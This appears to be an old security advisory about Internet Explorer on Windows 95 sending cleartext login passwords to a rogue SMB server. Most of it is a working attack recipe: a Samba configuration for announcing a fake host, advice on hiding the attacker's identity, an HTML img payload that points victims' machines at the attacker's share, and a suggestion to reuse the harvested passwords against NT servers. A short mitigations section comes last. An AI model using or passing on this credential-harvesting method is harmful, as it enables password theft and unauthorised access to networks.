COMMAND
Internet Explorer
SYSTEMS AFFECTED
Win '95
PROBLEM
There is new security hole to be exploited with MSIE. Details on:
http://www.security.org.il/msnetbreak/
It is possible from anywhere on the Internet to obtain the
cleartext Windows 95 login password from a Windows 95 computer on
a network connected directly to the Internet given only the IP
address and the workgroup and leave no trace of your actions. It
is untested and may work with Windows For Workgroups as well.
There has been recent discussion on security mailing lists
concerning the fact that Microsoft Internet Explorer running on
Windows NT will automatically try to log in to a remote SMB
server (file server) without prompting the user or without the
user's knowledge. By design, the NT machine will transmit to this
remote server the encrypted password and username of the user.
This is documented by Aaron Spangler. The caveats with this are
that the passwords are encrypted and that in many cases people do
not use WWW browsers from NT servers, but rather from computers
running Windows 95.
It has been explained that this same exploit does not work against
Windows 95 because Windows 95 is only capable of accessing SMB
shares (file sharing) if they are:
* Connected to the same subnet.
* In the Windows 95 computer's LMHOSTS file on startup
* Announced to the Windows 95 computer by a Master Browser
It is this third and final condition that can be taken advantage
of to obtain the cleartext password and username of any Windows
95 user who uses Microsoft Internet Explorer. Even careless use
of Microsoft Network Neighborhood can exploit this hole without
the requirement for Internet Explorer The requirements are
knowledge of the user's IP address, workgroup name and that they
access a hostile web page. The first two are not difficult to
obtain and the third does not have to be an obscure page. In the
last 6 months sites such as the CIA have been broken into. All it
would require is that one un-noticeable line be added to the home
page. Since the viewable content of the page has not been
altered, such a change can go unnoticed for a long time.
Exploit involves the use of the Unix SMB implementation called
Samba. There are no source changes required, but it should be
compiled with -DDEBUG_PASSWORD. Samba has an option in the
smb.cfg file called remote announce. This allows you to specify a
network address (host or broadcast) and workgroup name to inform
about your existence. I have configured the [global] section of
the smb.conf file like this:
workgroup = EXPLOIT
preferred master = yes
domain master = yes
security = user
debug level = 100
remote announce = 10.0.0.255/WORKGROUP
The only thing that must be changed is the remote announce line.
The rest works as-is. A simple share must then be set up such as:
[exploit]
path = /tmp
public = no
browsable = yes
Nothing needs to be in the directory as nobody will ever see it.
For the sake of untractability, change your hostname to something
that does not exist, but ensure to create an entry for it in
/etc/hosts. This makes your host untraceable unless the network
you are connecting to monitors network traffic.
Run smbd. If you are running it from inetd, the process must at
least start itself in order to send the broadcast. Using
smbclient to browse yourself is enough for this. The broadcast
gets sent regardless of what smbd was started for.
At this point if anyone on the target network were to look at
their Windows 95 Network Neighborhood they would see the host
"EXPLOIT". The host is now vulnerable to your attack. While this
step may seem a bit obscure and complicated, the truth is that it
is very simple. I won't get into details here, but the methods
for obtaining the workgroup name are easy to use and readily
available. Finding a target network that has not protected ports
137 and 139 is also not so hard. Once you've done that, setting
everything up to here takes a very short ammount of time.
The final and easiest step is to include the following in any html
file a user on this network accesses:
<img src=file://\\exploit/exploit/t.gif>
You will now see in your Samba log a line such as this:
checking user=[user] pass=[INNOCENT]
The password of any Internet-connected user running Microsoft
Internet Explorer on Windows 95 obtained be found in cleartext
provided that their network administrator has not protected them
from accessing external SMB servers by closing ports 139 and 137.
If you have obtained the password of a user of a Windows NT
server, you can now take the username, password and workgroup and
log into that Windows NT server. Your true hostname and IP
address are not stored in the html file and I am aware of no
logging of hosts that enter the browse list. This means that you
are not traceable, even though they are connecting to your
machine. If you are lucky, you found the Windows 95 machine of
the NT administrator and have little work left in order to access
the NT server with administrator privileges.
For demonstration check the original sote (the one above).
Discovery by Steve Birnbaum with help from Mark Gazit.
Additional support from Yacov Drori and Roman Lasker.
SOLUTION
Well, try something of following before MS come up with
something:
* Use Netscape
* Use a proxy firewall or packet filter to close off ports
137 and 139 from external access to your network, though
this still leaves you at risk from internal attacks.
* Ask Microsoft to rewrite Windows to not send passwords by
default.